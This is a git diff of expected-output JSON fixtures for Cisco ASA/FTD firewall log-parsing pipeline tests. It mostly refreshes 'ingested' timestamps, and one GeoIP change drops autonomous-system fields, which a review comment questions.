outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3322,7 +3322,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535184800Z", + "ingested": "2021-12-14T14:36:57.032454969Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", 
@@ -3391,7 +3391,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535189900Z", + "ingested": "2021-12-14T14:36:57.032455305Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3457,7 +3457,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535193800Z", + "ingested": "2021-12-14T14:36:57.032455633Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3528,7 +3528,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535198400Z", + "ingested": "2021-12-14T14:36:57.032455963Z", "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3602,7 +3602,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535204300Z", + "ingested": "2021-12-14T14:36:57.032456380Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3678,7 +3678,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535208900Z", + "ingested": "2021-12-14T14:36:57.032456719Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", 
@@ -3756,7 +3756,7 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535213500Z", + "ingested": "2021-12-14T14:36:57.032457049Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3829,7 +3829,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-09T13:32:11.535217400Z", + "ingested": "2021-12-14T14:36:57.032457379Z", "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3896,7 +3896,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535222200Z", + "ingested": "2021-12-14T14:36:57.032457784Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -3960,7 +3960,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535226500Z", + "ingested": "2021-12-14T14:36:57.032458110Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4024,7 +4024,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535231100Z", + "ingested": "2021-12-14T14:36:57.032458446Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4088,7 +4088,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535236Z", + "ingested": "2021-12-14T14:36:57.032458780Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4152,7 +4152,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535258400Z", + "ingested": "2021-12-14T14:36:57.032459115Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4216,7 +4216,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535263300Z", + "ingested": "2021-12-14T14:36:57.032459463Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4280,7 +4280,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535269400Z", + "ingested": "2021-12-14T14:36:57.032459799Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4344,7 +4344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535273900Z", + "ingested": "2021-12-14T14:36:57.032460127Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4419,7 +4419,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535278800Z", + "ingested": "2021-12-14T14:36:57.032460468Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", 
@@ -4484,7 +4484,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:32:11.535300500Z", + "ingested": "2021-12-14T14:36:57.032460801Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4547,7 +4547,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535306100Z", + "ingested": "2021-12-14T14:36:57.032461136Z", "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4628,7 +4628,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535311500Z", + "ingested": "2021-12-14T14:36:57.032461467Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4706,7 +4706,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535315800Z", + "ingested": "2021-12-14T14:36:57.032461793Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", 
@@ -4785,7 +4785,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535320300Z", + "ingested": "2021-12-14T14:36:57.032462124Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4849,7 +4849,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535325700Z", + "ingested": "2021-12-14T14:36:57.032462461Z", "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", @@ -4905,7 +4905,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535330500Z", + "ingested": "2021-12-14T14:36:57.032462815Z", "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535334400Z", + "ingested": "2021-12-14T14:36:57.032463152Z", "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", @@ -4994,20 +4994,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
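Review bot: The regenerated expectation for the 302013 event (`"address": "81.2.69.144"`) drops the entire `destination.as` object (`"number": 20712`, organization `Andrews & Arnold Ltd`) rather than only updating the city/region/location values, and nothing in the hunk says why. If this merely reflects a new GeoIP test database shipped with the upgraded test tooling, a sentence to that effect in the commit description would stop the next reader from suspecting the pipeline's ASN lookup regressed; if it does not, the `geoip` processor that populates `destination.as` should be checked before this fixture is accepted, because detection content keyed on `destination.as.number` or `destination.as.organization.name` would silently stop matching. The surrounding JSON document starts and ends outside the hunk.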
@@ -5063,7 +5057,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535339100Z", + "ingested": "2021-12-14T14:36:57.032463486Z", "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)", "code": "302013", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json index d8a0285afc9..2c8960a2313 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:19.965226800Z", + "ingested": "2021-12-14T14:37:04.974743379Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:19.965230800Z", + "ingested": "2021-12-14T14:37:04.974745470Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:19.965235200Z", + "ingested": "2021-12-14T14:37:04.974745944Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", 
@@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:19.965239100Z", + "ingested": "2021-12-14T14:37:04.974746366Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:19.965242900Z", + "ingested": "2021-12-14T14:37:04.974746770Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json index f3f42c70e51..0cf9c379306 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603706900Z", + "ingested": "2021-12-14T14:37:05.575470184Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603715500Z", + "ingested": "2021-12-14T14:37:05.575472447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", 
@@ -224,7 +224,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603721500Z", + "ingested": "2021-12-14T14:37:05.575472839Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +309,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603727400Z", + "ingested": "2021-12-14T14:37:05.575473181Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +394,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603733100Z", + "ingested": "2021-12-14T14:37:05.575473538Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +479,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603738900Z", + "ingested": "2021-12-14T14:37:05.575473870Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -564,7 +564,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603744600Z", + "ingested": "2021-12-14T14:37:05.575474204Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +649,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603750400Z", + "ingested": "2021-12-14T14:37:05.575474541Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +734,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603756200Z", + "ingested": "2021-12-14T14:37:05.575474876Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +819,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603762100Z", + "ingested": "2021-12-14T14:37:05.575475220Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -904,7 +904,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603767900Z", + "ingested": "2021-12-14T14:37:05.575475550Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +989,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603774Z", + "ingested": "2021-12-14T14:37:05.575476070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1074,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603779900Z", + "ingested": "2021-12-14T14:37:05.575476529Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1159,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603824200Z", + "ingested": "2021-12-14T14:37:05.575476868Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1244,7 +1244,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603829500Z", + "ingested": "2021-12-14T14:37:05.575477202Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1329,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603835800Z", + "ingested": "2021-12-14T14:37:05.575477534Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1414,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603839700Z", + "ingested": "2021-12-14T14:37:05.575477996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1499,7 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603843800Z", + "ingested": "2021-12-14T14:37:05.575478333Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1584,7 +1584,7 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-09T13:32:20.603847300Z", + "ingested": "2021-12-14T14:37:05.575478694Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1666,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603851800Z", + "ingested": "2021-12-14T14:37:05.575479032Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1745,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603857600Z", + "ingested": "2021-12-14T14:37:05.575479368Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1830,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603862600Z", + "ingested": "2021-12-14T14:37:05.575479696Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1913,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603868400Z", + "ingested": "2021-12-14T14:37:05.575480029Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -1998,7 +1998,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603874500Z", + "ingested": "2021-12-14T14:37:05.575480466Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2080,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603880300Z", + "ingested": "2021-12-14T14:37:05.575480818Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2159,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603886100Z", + "ingested": "2021-12-14T14:37:05.575481174Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2242,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603891900Z", + "ingested": "2021-12-14T14:37:05.575481525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603897800Z", + "ingested": "2021-12-14T14:37:05.575481852Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", 
@@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603903600Z", + "ingested": "2021-12-14T14:37:05.575482184Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603909400Z", + "ingested": "2021-12-14T14:37:05.575482519Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603915200Z", + "ingested": "2021-12-14T14:37:05.575482851Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603921Z", + "ingested": "2021-12-14T14:37:05.575483196Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603926900Z", + "ingested": "2021-12-14T14:37:05.575483541Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", 
@@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603932700Z", + "ingested": "2021-12-14T14:37:05.575483875Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603941800Z", + "ingested": "2021-12-14T14:37:05.575484308Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603946100Z", + "ingested": "2021-12-14T14:37:05.575484639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603953400Z", + "ingested": "2021-12-14T14:37:05.575484986Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603958Z", + "ingested": "2021-12-14T14:37:05.575485333Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", 
